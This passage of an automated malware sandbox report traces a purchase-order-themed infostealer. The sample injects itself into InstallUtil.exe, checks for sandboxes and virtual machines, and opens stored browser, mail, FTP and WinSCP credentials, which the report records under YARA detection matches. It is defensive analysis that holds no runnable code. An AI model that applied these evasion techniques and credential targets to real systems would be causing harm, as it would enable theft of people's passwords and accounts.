                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1560000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 4E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2430000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12D0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1440000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: Avycqjqvmh.exe, 00000005.00000002.1933803707.0000000000FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.2948929399.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUSV
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1729456286.0000000000863000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1863935093.0000000005C95000.00000004.00000020.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1853373484.0000000001311000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1951096266.000000000593F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10A8008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A0000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1A2000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1DC000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1DE000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 25F008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D3E008Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeQueries volume information: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeQueries volume information: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeQueries volume information: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1937354915.000000000243C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1857971492.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7096, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5796, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 2472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5996, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Avycqjqvmh.exe PID: 928, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7140, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
